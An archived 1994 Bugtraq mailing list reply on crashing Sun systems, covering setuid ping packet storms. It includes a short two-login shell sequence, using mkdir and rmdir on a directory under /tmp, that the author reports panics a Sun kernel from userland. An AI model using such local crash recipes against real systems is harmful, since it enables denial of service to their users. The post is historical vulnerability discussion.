Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: udp packet storms - ping death
From: chowes () helix net (Charles Howes)
Date: Thu, 3 Nov 1994 22:53:49 -0800 (PST)

On Wed, 2 Nov 1994, Perry E. Metzger wrote:


Charles Howes says:

Our copy of ping is installed setuid root; ...


So you mean that any student at princeton can panic any Sun there just by
typing that command?  Cool...


There are already so many ways to panic suns from userland...


Yes, I've found one that's rather easy:

Sign on twice.  Transcript one:
  cd /tmp
  mkdir foo
  cd foo
   (*)
  mkdir bar

Transcript two:  (Executed at '*' in transcript one)
  cd /tmp
  rmdir foo

I don't think you can remove the 'mkdir' part of the kernel without
causing some major problems.

--
Charles Howes -- chowes () helix net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]